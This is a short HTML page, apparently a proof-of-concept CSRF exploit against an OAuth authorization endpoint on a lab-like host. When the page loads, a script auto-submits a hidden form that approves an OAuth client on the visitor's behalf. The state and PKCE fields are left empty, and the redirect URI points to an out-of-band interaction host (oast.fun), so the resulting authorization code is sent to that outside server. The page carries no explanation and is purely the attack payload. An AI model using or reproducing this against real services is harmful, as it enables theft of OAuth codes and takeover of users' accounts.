<html>  
<body>  
<form action="http://authorization-ptl-402e9b14-540bfe3a.libcurl.so/oauth/authorize" method="POST">
<input type="hidden" name="authenticity_token" value="dZTZpDrt4sc10ZARv7LY%2Bx04vfBfhXQlMq97PJtAq4AL4WRaGTLkXbtT19LJD9XfArFuCjWavZ2IJ%2B0nZenGYw%3D%3D" />  
<input type="hidden" name="client_id" value="684d9c7032e14a36715d2ff2f8672bc5a7b866002ca8877458a9c490f074d2ce" />
<input type="hidden" name="redirect_uri" value="http%3A%2F%2Fckdar202vtc0000dp7cggk1jfxyyyyyyf.oast.fun%2F" />
<input type="hidden" name="state" value="" />
<input type="hidden" name="response_type" value="code" />
<input type="hidden" name="scope" value="" />
<input type="hidden" name="code_challenge" value="" />
<input type="hidden" name="code_challenge_method" value="" />
<input type="hidden" name="commit" value="Authorize" />
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>
